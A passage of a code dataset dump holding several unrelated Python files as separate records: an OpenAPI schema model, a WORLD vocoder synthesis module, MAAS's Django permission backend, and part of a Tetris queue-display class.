Object](#schemaObject) and not a standard JSON Schema.**\n    \n    From JSON Schema:\n    This keyword's value MUST be an array. This array MUST have at least\n    one element.\n    \n    Elements of the array MUST be objects. Each object MUST be a valid\n    JSON Schema.\n    \n    An instance validates successfully against this keyword if it\n    validates successfully against at least one schema defined by this\n    keyword's value.\n    \"\"\"\n\n    schema_not: Optional[Union[Reference, \"Schema\"]] = Field(default=None, alias=\"not\")\n    \"\"\"\n    **From OpenAPI spec:\n    Inline or referenced schema MUST be of a [Schema Object](#schemaObject) and not a standard JSON Schema.**\n    \n    From JSON Schema:\n    This keyword's value MUST be an object. This object MUST be a valid\n    JSON Schema.\n    \n    An instance is valid against this keyword if it fails to validate\n    successfully against the schema defined by this keyword.\n    \"\"\"\n\n    items: Optional[Union[Reference, \"Schema\"]] = None\n    \"\"\"\n    **From OpenAPI spec:\n    Value MUST be an object and not an array.\n    Inline or referenced schema MUST be of a [Schema Object](#schemaObject) and not a standard JSON Schema.\n    `items` MUST be present if the `type` is `array`.**\n    \n    From JSON Schema:\n    The value of \"items\" MUST be either a schema or array of schemas.\n\n    Successful validation of an array instance with regards to these two\n    keywords is determined as follows:\n    \n    - if \"items\" is not present, or its value is an object, validation\n      of the instance always succeeds, regardless of the value of\n      \"additionalItems\";\n    - if the value of \"additionalItems\" is boolean value true or an\n      object, validation of the instance always succeeds;\n    - if the value of \"additionalItems\" is boolean value false and the\n      value of \"items\" is an array, the instance is valid if its size is\n      less than, or equal to, the size of \"items\".\n    \"\"\"\n\n    properties: Optional[Dict[str, Union[Reference, \"Schema\"]]] = None\n    \"\"\"\n    **From OpenAPI spec:\n    Property definitions MUST be a [Schema Object](#schemaObject)\n    and not a standard JSON Schema (inline or referenced).**\n    \n    From JSON Schema:\n    The value of \"properties\" MUST be an object. Each value of this\n    object MUST be an object, and each object MUST be a valid JSON\n    Schema.\n    \n    If absent, it can be considered the same as an empty object.\n    \"\"\"\n\n    additionalProperties: Optional[Union[bool, Reference, \"Schema\"]] = None\n    \"\"\"\n    **From OpenAPI spec:\n    Value can be boolean or object.\n    Inline or referenced schema MUST be of a [Schema Object](#schemaObject) and not a standard JSON Schema.\n    Consistent with JSON Schema, `additionalProperties` defaults to `true`.**\n    \n    From JSON Schema:\n    The value of \"additionalProperties\" MUST be a boolean or a schema.\n\n    If \"additionalProperties\" is absent, it may be considered present\n    with an empty schema as a value.\n    \n    If \"additionalProperties\" is true, validation always succeeds.\n    \n    If \"additionalProperties\" is false, validation succeeds only if the\n    instance is an object and all properties on the instance were covered\n    by \"properties\" and/or \"patternProperties\".\n    \n    If \"additionalProperties\" is an object, validate the value as a\n    schema to all of the properties that weren't validated by\n    \"properties\" nor \"patternProperties\".\n    \"\"\"\n\n    description: Optional[str] = None\n    \"\"\"\n    **From OpenAPI spec:\n    [CommonMark syntax](https://spec.commonmark.org/) MAY be used for rich text representation.**\n    \n    From JSON Schema:\n    The value \"description\" MUST be a string.\n\n    The description can be used to decorate a user interface with\n    information about the data produced by this user interface.\n    The description will provide explanation about the purpose of\n    the instance described by this schema.\n    \"\"\"\n\n    schema_format: Optional[str] = Field(default=None, alias=\"format\")\n    \"\"\"\n    **From OpenAPI spec:\n    [Data Type Formats](#dataTypeFormat) for further details.\n    While relying on JSON Schema's defined formats, the OAS offers a few additional predefined formats.**\n    \n    From JSON Schema:\n    Structural validation alone may be insufficient to validate that an\n    instance meets all the requirements of an application. The \"format\"\n    keyword is defined to allow interoperable semantic validation for a\n    fixed subset of values which are accurately described by\n    authoritative resources, be they RFCs or other external\n    specifications.\n    \n    The value of this keyword is called a format attribute. It MUST be a\n    string. A format attribute can generally only validate a given set\n    of instance types. If the type of the instance to validate is not in\n    this set, validation for this format attribute and instance SHOULD\n    succeed.\n    \"\"\"\n\n    default: Optional[Any] = None\n    \"\"\"\n    **From OpenAPI spec:\n    The default value represents what would be assumed by the consumer of the input\n    as the value of the schema if one is not provided.\n    Unlike JSON Schema, the value MUST conform to the defined type for the Schema Object defined at the same level.\n    For example, if `type` is `string`, then `default` can be `\"foo\"` but cannot be `1`.**\n    \n    From JSON Schema:\n    There are no restrictions placed on the value of this keyword.\n    \n    This keyword can be used to supply a default JSON value associated\n    with a particular schema. It is RECOMMENDED that a default value be\n    valid against the associated schema.\n    \n    This keyword MAY be used in root schemas, and in any subschemas.\n    \"\"\"\n\n    \"\"\"\n    Other than the JSON Schema subset fields, the following fields MAY be used for further schema documentation:\n    \"\"\"\n\n    nullable: Optional[bool] = None\n    \"\"\"\n    A `true` value adds `\"null\"` to the allowed type specified by the `type` keyword,\n    only if `type` is explicitly defined within the same Schema Object.\n    Other Schema Object constraints retain their defined behavior,\n    and therefore may disallow the use of `null` as a value.\n    A `false` value leaves the specified or default `type` unmodified.\n    The default value is `false`.\n    \"\"\"\n\n    discriminator: Optional[Discriminator] = None\n    \"\"\"\n    Adds support for polymorphism.\n    The discriminator is an object name that is used to differentiate between other schemas\n    which may satisfy the payload description.\n    See [Composition and Inheritance](#schemaComposition) for more details.\n    \"\"\"\n\n    readOnly: Optional[bool] = None\n    \"\"\"\n    Relevant only for Schema `\"properties\"` definitions.\n    Declares the property as \"read only\".\n    This means that it MAY be sent as part of a response but SHOULD NOT be sent as part of the request.\n    If the property is marked as `readOnly` being `true` and is in the `required` list,\n    the `required` will take effect on the response only.\n    A property MUST NOT be marked as both `readOnly` and `writeOnly` being `true`.\n    Default value is `false`.\n    \"\"\"\n\n    writeOnly: Optional[bool] = None\n    \"\"\"\n    Relevant only for Schema `\"properties\"` definitions.\n    Declares the property as \"write only\".\n    Therefore, it MAY be sent as part of a request but SHOULD NOT be sent as part of the response.\n    If the property is marked as `writeOnly` being `true` and is in the `required` list,\n    the `required` will take effect on the request only.\n    A property MUST NOT be marked as both `readOnly` and `writeOnly` being `true`.\n    Default value is `false`.\n    \"\"\"\n\n    xml: Optional[XML] = None\n    \"\"\"\n    This MAY be used only on properties schemas.\n    It has no effect on root schemas.\n    Adds additional metadata to describe the XML representation of this property.\n    \"\"\"\n\n    externalDocs: Optional[ExternalDocumentation] = None\n    \"\"\"\n    Additional external documentation for this schema.\n    \"\"\"\n\n    example: Optional[Any] = None\n    \"\"\"\n    A free-form property to include an example of an instance for this schema.\n    To represent examples that cannot be naturally represented in JSON or YAML,\n    a string value can be used to contain the example with escaping where necessary.\n    \"\"\"\n\n    deprecated: Optional[bool] = None\n    \"\"\" \n    Specifies that a schema is deprecated and SHOULD be transitioned out of usage.\n    Default value is `false`.\n    \"\"\"\n\n    class Config:\n        extra = Extra.ignore\n        allow_population_by_field_name = True\n        schema_extra = {\n            \"examples\": [\n                {\"type\": \"string\", \"format\": \"email\"},\n                {\n                    \"type\": \"object\",\n                    \"required\": [\"name\"],\n                    \"properties\": {\n                        \"name\": {\"type\": \"string\"},\n                        \"address\": {\"$ref\": \"#/components/schemas/Address\"},\n                        \"age\": {\"type\": \"integer\", \"format\": \"int32\", \"minimum\": 0},\n                    },\n                },\n                {\"type\": \"object\", \"additionalProperties\": {\"type\": \"string\"}},\n                {\"type\": \"object\", \"additionalProperties\": {\"$ref\": \"#/components/schemas/ComplexModel\"}},\n                {\n                    \"type\": \"object\",\n                    \"properties\": {\"id\": {\"type\": \"integer\", \"format\": \"int64\"}, \"name\": {\"type\": \"string\"}},\n                    \"required\": [\"name\"],\n                    \"example\": {\"name\": \"Puma\", \"id\": 1},\n                },\n                {\n                    \"type\": \"object\",\n                    \"required\": [\"message\", \"code\"],\n                    \"properties\": {\n                        \"message\": {\"type\": \"string\"},\n                        \"code\": {\"type\": \"integer\", \"minimum\": 100, \"maximum\": 600},\n                    },\n                },\n                {\n                    \"allOf\": [\n                        {\"$ref\": \"#/components/schemas/ErrorModel\"},\n                        {\"type\": \"object\", \"required\": [\"rootCause\"], \"properties\": {\"rootCause\": {\"type\": \"string\"}}},\n                    ]\n                },\n                {\n                    \"type\": \"object\",\n                    \"discriminator\": {\"propertyName\": \"petType\"},\n                    \"properties\": {\"name\": {\"type\": \"string\"}, \"petType\": {\"type\": \"string\"}},\n                    \"required\": [\"name\", \"petType\"],\n                },\n                {\n                    \"description\": \"A representation of a cat. \"\n                    \"Note that `Cat` will be used as the discriminator value.\",\n                    \"allOf\": [\n                        {\"$ref\": \"#/components/schemas/Pet\"},\n                        {\n                            \"type\": \"object\",\n                            \"properties\": {\n                                \"huntingSkill\": {\n                                    \"type\": \"string\",\n                                    \"description\": \"The measured skill for hunting\",\n                                    \"default\": \"lazy\",\n                                    \"enum\": [\"clueless\", \"lazy\", \"adventurous\", \"aggressive\"],\n                                }\n                            },\n                            \"required\": [\"huntingSkill\"],\n                        },\n                    ],\n                },\n                {\n                    \"description\": \"A representation of a dog. \"\n                    \"Note that `Dog` will be used as the discriminator value.\",\n                    \"allOf\": [\n                        {\"$ref\": \"#/components/schemas/Pet\"},\n                        {\n                            \"type\": \"object\",\n                            \"properties\": {\n                                \"packSize\": {\n                                    \"type\": \"integer\",\n                                    \"format\": \"int32\",\n                                    \"description\": \"the size of the pack the dog is from\",\n                                    \"default\": 0,\n                                    \"minimum\": 0,\n                                }\n                            },\n                            \"required\": [\"packSize\"],\n                        },\n                    ],\n                },\n            ]\n        }\n","repo_name":"kuimono/openapi-schema-pydantic","sub_path":"openapi_schema_pydantic/v3/v3_0_3/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":21555,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"69"}
+{"seq_id":"24651603006","text":"# 3rd-party imports\nimport numpy as np\nfrom scipy.interpolate import interp1d\nfrom scipy.signal import hanning\nfrom scipy.fftpack import fft, ifft\nimport numba\nimport matplotlib.pyplot as plt\n\n# build-in imports\nfrom decimal import Decimal, ROUND_HALF_UP\n\ndef synthesisRequiem(source_object, filter_object, seeds_signals):\n    excitation_signal = get_excitation_signal(source_object['temporal_positions'],\n                                              filter_object['fs'],\n                                              source_object['f0'],\n                                              source_object['vuv'],\n                                              seeds_signals['pulse'],\n                                              seeds_signals['noise'],\n                                              source_object['aperiodicity'])\n    y = get_waveform(excitation_signal,\n                     filter_object['spectrogram'],\n                     source_object['temporal_positions'],\n                     source_object['f0'],\n                     filter_object['fs'])\n    return y\n\ndef get_excitation_signal(temporal_positions,\n                          fs,\n                          f0,\n                          vuv,\n                          pulse_seed,\n                          noise_seed,\n                          band_aperiodicity):\n\n    fft_size = pulse_seed.shape[0]\n    base_index = np.arange(-fft_size // 2 + 1, fft_size // 2 + 1)\n    number_of_aperiodicities = pulse_seed.shape[1]\n\n    time_axis = np.arange(temporal_positions[0], temporal_positions[-1] + 1 / fs, 1 / fs)\n    periodic_component = np.zeros(len(time_axis))\n    aperiodic_component = np.zeros(len(time_axis))\n\n    pulse_locations_index, interpolated_vuv = time_base_generation(temporal_positions, f0, fs, vuv, time_axis)\n\n    # band-aperiodicity is resampled at sampling frequency of fs Hz\n    interpolated_aperiodicity = aperiodicity_generation(temporal_positions, band_aperiodicity, time_axis)\n\n    # generation of the aperiodic component\n    for i in range(number_of_aperiodicities):\n        noise = generate_noise(len(aperiodic_component), noise_seed, i)\n        aperiodic_component += (noise * interpolated_aperiodicity[i, :len(aperiodic_component)])\n\n    # generation of the periodic component\n    for i in range(len(pulse_locations_index)):\n        if (interpolated_vuv[pulse_locations_index[i]-1] <= 0.5) or (interpolated_aperiodicity[0, pulse_locations_index[i]-1] > 0.999):\n            continue\n        noise_size = pulse_locations_index[min(len(pulse_locations_index) - 1, i + 1)] - pulse_locations_index[i]\n        noise_size = np.sqrt(max(1, noise_size))\n        output_buffer_index = np.maximum(1, np.minimum(len(time_axis), pulse_locations_index[i] + base_index))\n        response = get_one_periodic_excitation(number_of_aperiodicities, pulse_seed, interpolated_aperiodicity[:, pulse_locations_index[i]-1], noise_size)\n        periodic_component[output_buffer_index.astype(int)-1] += response\n    excitation_signal = periodic_component + aperiodic_component\n    return excitation_signal\n\n\ndef get_one_periodic_excitation(number_of_aperiodicities, pulse_seed, aperiodicity, noise_size):\n    response = np.zeros(len(pulse_seed[:,0]))\n    for i in range(number_of_aperiodicities):\n        response += pulse_seed[:,i] * (1 - aperiodicity[i])\n    response *= noise_size\n    return response\n\n\ndef get_waveform(excitation_signal, spectrogram, temporal_positions, f0, fs):\n    y = np.zeros(len(excitation_signal))\n    fft_size = (spectrogram.shape[0] - 1) * 2\n    latter_index = np.arange(int(fft_size // 2 + 1), fft_size+1)\n    frame_period_sample = int((temporal_positions[1] - temporal_positions[0]) * fs)\n    win_len = frame_period_sample * 2 - 1\n    half_win_len = frame_period_sample - 1\n    win = hanning(win_len+2)[1:-1]\n\n    for i in range(2, len(f0)-1):\n        origin = (i - 1) * frame_period_sample - half_win_len\n        safe_index = np.minimum(len(y), np.arange(origin, origin + win_len))\n\n        tmp = excitation_signal[safe_index-1] * win\n        spec = spectrogram[:,i-1]\n        periodic_spectrum = np.r_[spec, spec[-2:0:-1]]\n\n        tmp_cepstrum = np.fft.fft(np.log(np.abs(periodic_spectrum)) / 2).real\n        tmp_complex_cepstrum = np.zeros(fft_size)\n        tmp_complex_cepstrum[latter_index.astype(int) - 1] = tmp_cepstrum[latter_index.astype(int) - 1] * 2\n        tmp_complex_cepstrum[0] = tmp_cepstrum[0]\n\n        spectrum = np.exp(np.fft.ifft(tmp_complex_cepstrum))\n        response = ifft(spectrum * fft(tmp, fft_size)).real\n\n        safe_index = np.minimum(len(y), np.arange(origin, origin+fft_size))\n        y[safe_index-1] += response\n    return y\n\n\ndef time_base_generation(temporal_positions, f0, fs, vuv, time_axis):\n    f0_interpolated_raw = interp1d(temporal_positions, f0, kind='linear', fill_value='extrapolate')(time_axis)\n    vuv_interpolated = interp1d(temporal_positions, vuv, kind='linear', fill_value='extrapolate')(time_axis)\n    vuv_interpolated = vuv_interpolated > 0.5\n\n    f0_interpolated = f0_interpolated_raw * vuv_interpolated\n    default_f0 = 500\n    f0_interpolated[f0_interpolated == 0] = f0_interpolated[f0_interpolated == 0] + default_f0\n\n    total_phase = np.cumsum(2 * np.pi * f0_interpolated / fs)\n    wrap_phase = np.remainder(total_phase, 2 * np.pi)\n    pulse_locations = (time_axis[:-1])[np.abs(np.diff(wrap_phase)) > np.pi]\n    pulse_locations_index = np.array([int(Decimal(elm * fs).quantize(0, ROUND_HALF_UP)) for elm in pulse_locations]) + 1\n\n    return pulse_locations_index, vuv_interpolated\n\ndef aperiodicity_generation(temporal_positions, band_aperiodicity, time_axis):\n    number_of_aperiodicities = band_aperiodicity.shape[0]\n    multi_aperiodicity = np.zeros((number_of_aperiodicities, len(time_axis)))\n\n    for i in range(number_of_aperiodicities):\n        multi_aperiodicity[i,:] = interp1d(temporal_positions, 10 ** (band_aperiodicity[i, :] / 10),\n                                           kind='linear', fill_value='extrapolate')(time_axis)\n\n    return multi_aperiodicity\n\n\ndef generate_noise(N, noise_seed, frequency_band):\n    # current_index is a persistent variable of the function\n    if np.all(generate_noise.current_index == None):\n        generate_noise.current_index = np.zeros(noise_seed.shape[1])\n    noise_length = noise_seed.shape[0]\n\n    index = np.remainder(np.arange(generate_noise.current_index[frequency_band], generate_noise.current_index[frequency_band]+N), noise_length).astype(int)\n    n = noise_seed[index, frequency_band]\n    generate_noise.current_index[frequency_band] = index[-1]\n    return n\ngenerate_noise.current_index = None\n\n#####################################################################################################\n@numba.jit((numba.float64[:],), nopython=True, cache=True)\ndef round_matlab(x: np.ndarray) -> np.ndarray:\n    '''\n    round function works as matlab round\n    :param x: input vector\n    :return: rounded vector\n    '''\n    #return int(Decimal(n).quantize(0, ROUND_HALF_UP))\n    y = x.copy()\n    y[x > 0] += 0.5\n    y[x <= 0] -= 0.5\n    return y\n","repo_name":"tuanad121/Python-WORLD","sub_path":"world/synthesisRequiem.py","file_name":"synthesisRequiem.py","file_ext":"py","file_size_in_byte":7057,"program_lang":"python","lang":"en","doc_type":"code","stars":140,"dataset":"github-code","pt":"69"}
+{"seq_id":"40304874277","text":"from django.contrib.auth.backends import ModelBackend\nfrom django.contrib.auth.models import User\n\nfrom maasserver.enum import NODE_TYPE\nfrom maasserver.models.blockdevice import BlockDevice\nfrom maasserver.models.bmc import Pod\nfrom maasserver.models.discovery import Discovery\nfrom maasserver.models.dnsdata import DNSData\nfrom maasserver.models.dnsresource import DNSResource\nfrom maasserver.models.domain import Domain\nfrom maasserver.models.fabric import Fabric\nfrom maasserver.models.filesystemgroup import FilesystemGroup\nfrom maasserver.models.interface import Interface\nfrom maasserver.models.node import Node\nfrom maasserver.models.resourcepool import ResourcePool\nfrom maasserver.models.space import Space\nfrom maasserver.models.staticroute import StaticRoute\nfrom maasserver.models.subnet import Subnet\nfrom maasserver.models.tag import Tag\nfrom maasserver.models.vlan import VLAN\nfrom maasserver.models.vmcluster import VMCluster\nfrom maasserver.permissions import (\n NodePermission,\n PodPermission,\n ResourcePoolPermission,\n VMClusterPermission,\n)\nfrom provisioningserver.utils import is_instance_or_subclass\n\n# Some actions are applied to model object types global to MAAS; not\n# necessarily a particular object. The following objects cannot be created or\n# changed by non-administrative users, but superusers can always create, read\n# write, or delete them.\nUNRESTRICTED_READ_MODELS = (\n DNSData,\n DNSResource,\n Domain,\n Fabric,\n ResourcePool,\n Space,\n Subnet,\n Tag,\n StaticRoute,\n VLAN,\n)\n\n# The following model objects are restricted from non-administrative users.\n# They cannot be seen (or created, or modified, or deleted) by \"normal\" users.\nADMIN_RESTRICTED_MODELS = (Discovery,)\n\n# ADMIN_PERMISSIONS applies to the model objects in ADMIN_RESTRICTED_MODELS.\n# These model objects are restricted to administrators only; permission checks\n# will return True for administrators given any of the following permissions:\nADMIN_PERMISSIONS = (\n NodePermission.view,\n NodePermission.edit,\n NodePermission.admin,\n NodePermission.admin_read,\n)\n\n\nclass MAASAuthorizationBackend(ModelBackend):\n supports_object_permissions = True\n\n def authenticate(self, request, username=None, password=None, **kwargs):\n external_auth_info = getattr(request, \"external_auth_info\", None)\n # use getattr so that tests that don't include the middleware don't\n # explode\n if external_auth_info:\n # Don't allow username/password logins with external authentication\n return\n authenticated = super().authenticate(\n request, username=username, password=password, **kwargs\n )\n if authenticated:\n user = User.objects.get(username=username)\n if not user.userprofile.is_local:\n return\n return authenticated\n\n def has_perm(self, user, perm, obj=None):\n self._sanity_checks(perm, obj=obj)\n if not user.is_active:\n # Deactivated users, and in particular the node-init user,\n # are prohibited from accessing maasserver services.\n return False\n\n from maasserver.rbac import rbac\n\n rbac_enabled = rbac.is_enabled()\n visible_pools, view_all_pools = [], []\n deploy_pools, admin_pools = [], []\n if rbac_enabled:\n fetched_pools = rbac.get_resource_pool_ids(\n user.username,\n \"view\",\n \"view-all\",\n \"deploy-machines\",\n \"admin-machines\",\n )\n visible_pools = fetched_pools[\"view\"]\n view_all_pools = fetched_pools[\"view-all\"]\n deploy_pools = fetched_pools[\"deploy-machines\"]\n admin_pools = fetched_pools[\"admin-machines\"]\n\n # 
Handle node permissions without objects.\n if perm == NodePermission.admin and obj is None:\n # User wants to admin writes to all nodes (aka. create a node),\n # must be superuser for those permissions.\n return user.is_superuser\n elif perm == NodePermission.view and obj is None:\n # XXX 2018-11-20 blake_r: View permission without an obj is used\n # for device create as a standard user. Currently there is no\n # specific DevicePermission and no way for this code path to know\n # its for a device. So it is represented using this path.\n #\n # View is only used for the create action, modifying a created\n # device uses the appropriate `NodePermission.edit` scoped to the\n # device being editted.\n if rbac_enabled:\n # User must either be global admin or have access to deploy\n # or admin some machines.\n return user.is_superuser or (\n len(deploy_pools) > 0 or len(admin_pools) > 0\n )\n return True\n\n # ResourcePool permissions are handled specifically.\n if isinstance(perm, ResourcePoolPermission):\n return self._perm_resource_pool(\n user, perm, rbac, visible_pools, obj\n )\n\n # Pod permissions are handled specifically.\n if isinstance(perm, PodPermission):\n return self._perm_pod(\n user,\n perm,\n rbac,\n visible_pools,\n view_all_pools,\n deploy_pools,\n admin_pools,\n obj,\n )\n\n if isinstance(perm, VMClusterPermission):\n return self._perm_vmcluster(\n user,\n perm,\n rbac,\n visible_pools,\n view_all_pools,\n admin_pools,\n obj,\n )\n\n if isinstance(obj, (Node, BlockDevice, FilesystemGroup)):\n if isinstance(obj, BlockDevice):\n obj = obj.get_node()\n elif isinstance(obj, FilesystemGroup):\n obj = obj.get_node()\n if perm == NodePermission.view:\n return self._can_view(\n rbac_enabled,\n user,\n obj,\n visible_pools,\n view_all_pools,\n deploy_pools,\n admin_pools,\n )\n elif perm == NodePermission.edit:\n can_edit = self._can_edit(\n rbac_enabled, user, obj, deploy_pools, admin_pools\n )\n return not obj.locked and can_edit\n elif perm == NodePermission.lock:\n # only machines can be locked\n can_edit = self._can_edit(\n rbac_enabled, user, obj, deploy_pools, admin_pools\n )\n return obj.pool_id is not None and can_edit\n elif perm == NodePermission.admin_read:\n return self._can_admin(rbac_enabled, user, obj, admin_pools)\n elif perm == NodePermission.admin:\n return not obj.locked and self._can_admin(\n rbac_enabled, user, obj, admin_pools\n )\n else:\n raise NotImplementedError(\n \"Invalid permission check (invalid permission name: %s).\"\n % perm\n )\n elif isinstance(obj, Interface):\n node = obj.get_node()\n if node is None:\n # Doesn't matter the permission level if the interface doesn't\n # have a node, the user must be a global admin.\n return user.is_superuser\n if perm == NodePermission.view:\n return self._can_view(\n rbac_enabled,\n user,\n node,\n visible_pools,\n view_all_pools,\n deploy_pools,\n admin_pools,\n )\n elif perm == NodePermission.edit:\n # Machine interface can only be modified by an administrator\n # of the machine. 
Even the owner of the machine cannot modify\n # the interfaces on that machine, unless they have\n # administrator rights.\n if node.node_type == NODE_TYPE.MACHINE:\n return self._can_admin(\n rbac_enabled, user, node, admin_pools\n )\n # Other node types must be editable by the user.\n return self._can_edit(\n rbac_enabled, user, node, deploy_pools, admin_pools\n )\n elif perm == NodePermission.admin:\n # Admin permission is solely granted to superusers.\n return self._can_admin(rbac_enabled, user, node, admin_pools)\n else:\n raise NotImplementedError(\n \"Invalid permission check (invalid permission name: %s).\"\n % perm\n )\n elif is_instance_or_subclass(obj, UNRESTRICTED_READ_MODELS):\n # This model is classified under 'unrestricted read' for any\n # logged-in user; so everyone can view, but only an admin can\n # do anything else.\n if perm == NodePermission.view:\n return True\n elif perm in ADMIN_PERMISSIONS:\n # Admin permission is solely granted to superusers.\n return user.is_superuser\n else:\n raise NotImplementedError(\n \"Invalid permission check (invalid permission name: %s).\"\n % perm\n )\n elif is_instance_or_subclass(obj, ADMIN_RESTRICTED_MODELS):\n # Only administrators are allowed to read/write these objects.\n if perm in ADMIN_PERMISSIONS:\n return user.is_superuser\n else:\n raise NotImplementedError(\n \"Invalid permission check (invalid permission name: %s).\"\n % perm\n )\n else:\n raise NotImplementedError(\n \"Invalid permission check (invalid object type).\"\n )\n\n def _sanity_checks(self, perm, obj=None):\n \"\"\"Perform sanity checks to ensure that the perm matches the object.\"\"\"\n # Sanity check that a `ResourcePool` is being checked against\n # `ResourcePoolPermission`.\n if (\n obj is not None\n and isinstance(obj, ResourcePool)\n and not isinstance(perm, ResourcePoolPermission)\n ):\n raise TypeError(\n \"obj type of ResourcePool must be checked \"\n \"against a `ResourcePoolPermission`.\"\n )\n\n # Sanity check that a `Pod` is being checked against `PodPermission`.\n if (\n obj is not None\n and isinstance(obj, Pod)\n and not isinstance(perm, PodPermission)\n ):\n raise TypeError(\n \"obj type of Pod must be checked against a `PodPermission`.\"\n )\n\n def _can_view(\n self,\n rbac_enabled,\n user,\n machine,\n visible_pools,\n view_all_pools,\n deploy_pools,\n admin_pools,\n ):\n if machine.pool_id is None:\n # Only machines are filtered for view access.\n return True\n if rbac_enabled:\n # Machine not owned by the user must be in the view_all_pools or\n # admin_pools for the user to be able to view the machine.\n if machine.owner_id is not None and machine.owner_id != user.id:\n return (\n machine.pool_id in view_all_pools\n or machine.pool_id in admin_pools\n )\n # Machine is not owned or owned by the user so must be in either\n # pool for the user to view it.\n return (\n machine.pool_id in visible_pools\n or machine.pool_id in view_all_pools\n or machine.pool_id in deploy_pools\n or machine.pool_id in admin_pools\n )\n return (\n machine.owner_id is None\n or machine.owner_id == user.id\n or user.is_superuser\n )\n\n def _can_edit(\n self, rbac_enabled, user, machine, deploy_pools, admin_pools\n ):\n editable = machine.owner_id is None or machine.owner_id == user.id\n if rbac_enabled:\n can_admin = self._can_admin(\n rbac_enabled, user, machine, admin_pools\n )\n can_edit = (\n machine.pool_id in deploy_pools\n or (machine.pool_id is None and machine.owner == user)\n or can_admin\n )\n return (editable and can_edit) or can_admin\n return 
editable or user.is_superuser\n\n def _can_admin(self, rbac_enabled, user, machine, admin_pools):\n if machine.pool_id is None:\n # Not a machine to be admin on this must have global admin.\n return user.is_superuser\n if rbac_enabled:\n return machine.pool_id in admin_pools\n return user.is_superuser\n\n def _perm_resource_pool(self, user, perm, rbac, visible_pools, obj=None):\n # `create` permissions is called without an `obj`.\n rbac_enabled = rbac.is_enabled()\n if perm == ResourcePoolPermission.create:\n if rbac_enabled:\n return rbac.can_create_resource_pool(user.username)\n return user.is_superuser\n if perm == ResourcePoolPermission.delete:\n if rbac_enabled:\n return rbac.can_delete_resource_pool(user.username)\n return user.is_superuser\n\n # From this point forward the `obj` must be a `ResourcePool`.\n if not isinstance(obj, ResourcePool):\n raise ValueError(\n \"only `ResourcePoolPermission.(create|delete)` can be used \"\n \"without an `obj`.\"\n )\n\n if perm == ResourcePoolPermission.edit:\n if rbac_enabled:\n return (\n obj.id\n in rbac.get_resource_pool_ids(user.username, \"edit\")[\n \"edit\"\n ]\n )\n return user.is_superuser\n elif perm == ResourcePoolPermission.view:\n if rbac_enabled:\n return obj.id in visible_pools\n return True\n\n raise ValueError(\"unknown ResourcePoolPermission value: %s\" % perm)\n\n def _perm_pod(\n self,\n user,\n perm,\n rbac,\n visible_pools,\n view_all_pools,\n deploy_pools,\n admin_pools,\n obj=None,\n ):\n # `create` permissions is called without an `obj`.\n rbac_enabled = rbac.is_enabled()\n if perm == PodPermission.create:\n return user.is_superuser\n\n # From this point forward the `obj` must be a `ResourcePool`.\n if not isinstance(obj, Pod):\n raise ValueError(\n \"only `PodPermission.create` can be used without an `obj`.\"\n )\n\n if perm == PodPermission.edit:\n if rbac_enabled:\n return obj.pool_id in admin_pools\n return user.is_superuser\n elif perm == PodPermission.compose:\n if rbac_enabled:\n return obj.pool_id in admin_pools\n return user.is_superuser\n elif perm == PodPermission.dynamic_compose:\n if rbac_enabled:\n return (\n obj.pool_id in deploy_pools or obj.pool_id in admin_pools\n )\n return True\n elif perm == PodPermission.view:\n if rbac_enabled:\n return (\n obj.pool_id in visible_pools\n or obj.pool_id in view_all_pools\n )\n return True\n\n raise ValueError(\"unknown PodPermission value: %s\" % perm)\n\n def _perm_vmcluster(\n self,\n user,\n perm,\n rbac,\n visible_pools,\n view_all_pools,\n admin_pools,\n obj=None,\n ):\n rbac_enabled = rbac.is_enabled()\n if not isinstance(obj, VMCluster):\n raise ValueError(\n \"`VMClusterPermission` requires an `obj` of type `VMCluster`\"\n )\n\n if perm == VMClusterPermission.view:\n if rbac_enabled:\n return (\n obj.pool_id in visible_pools\n or obj.pool_id in view_all_pools\n )\n return True\n\n if perm == VMClusterPermission.edit:\n if rbac_enabled:\n return obj.pool_id in admin_pools\n return user.is_superuser\n\n if perm == VMClusterPermission.delete:\n if rbac_enabled:\n return obj.pool_id in admin_pools\n return user.is_superuser\n\n raise ValueError(\"unknown VMClusterPermission value: %s\" % perm)\n","repo_name":"AmroseGirdhar/tyrone","sub_path":"src/maasserver/auth/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":17090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
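When RBAC is enabled, every check in the backend above collapses to set membership: is the machine's pool id in the set of pool ids RBAC granted at the required level? A toy sketch of the `_can_admin` shape (the pool ids here are made up, not from MAAS):

```python
admin_pools = {1, 2}            # pools where RBAC granted admin-machines

def can_admin(pool_id, is_superuser, rbac_enabled=True):
    if pool_id is None:         # not a machine: only global admins qualify
        return is_superuser
    if rbac_enabled:
        return pool_id in admin_pools
    return is_superuser

print(can_admin(2, False))      # True  - pool 2 is admin-granted
print(can_admin(5, False))      # False - pool 5 is not
print(can_admin(None, True))    # True  - global admin fallback
```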
+{"seq_id":"30584997822","text":"# -*- coding: utf-8 -*-\n\nfrom src.constants.graphics import QUEUE_SQUARE_SIZE_PIXELS, QUEUE_FONT_SIZE, QUEUE_SURFACE_HEIGHT\nfrom src.constants.random_bag import QUEUE_LENGTH\nfrom src.graphics.regions.region import Region\nfrom src.graphics import utils\n\n\nclass QueueRegion(Region):\n \"\"\"Class QueueRegion. Class representing the region of the game screen where\n the next pieces are displayed.\"\"\"\n \n def __init__(self):\n \"\"\"Overload of constructor for QueueRegion class.\"\"\"\n Region.__init__(self)\n self._text = utils.draw_text(\"Next Pieces\", QUEUE_FONT_SIZE)\n \n \n def _update_kwargs_test(self, kwargs, keys_list):\n \"\"\"Performs the test by Region._update_kwargs_test and additionally checks\n the size of the list in parameter is correct.\"\"\"\n Region._update_kwargs_test(self, kwargs, keys_list)\n if len(kwargs[\"queue\"]) != QUEUE_LENGTH:\n raise TypeError(\"{}.update() parameter queue has size {}, {} expected\".format(self.__class__.__name__, len(kwargs[\"queue\"]), QUEUE_LENGTH))\n \n \n def update(self, **kwargs):\n \"\"\"Implementation of the update method for the QueueRegion.\"\"\"\n self._update_kwargs_test(kwargs, [\"queue\"])\n \n queue = kwargs[\"queue\"]\n \n pieces = [utils.draw_outside_tetrimino(piece, QUEUE_SQUARE_SIZE_PIXELS) for piece in queue]\n self._surface = utils.merge_surfaces_vertically([self._text, *pieces], total_height = 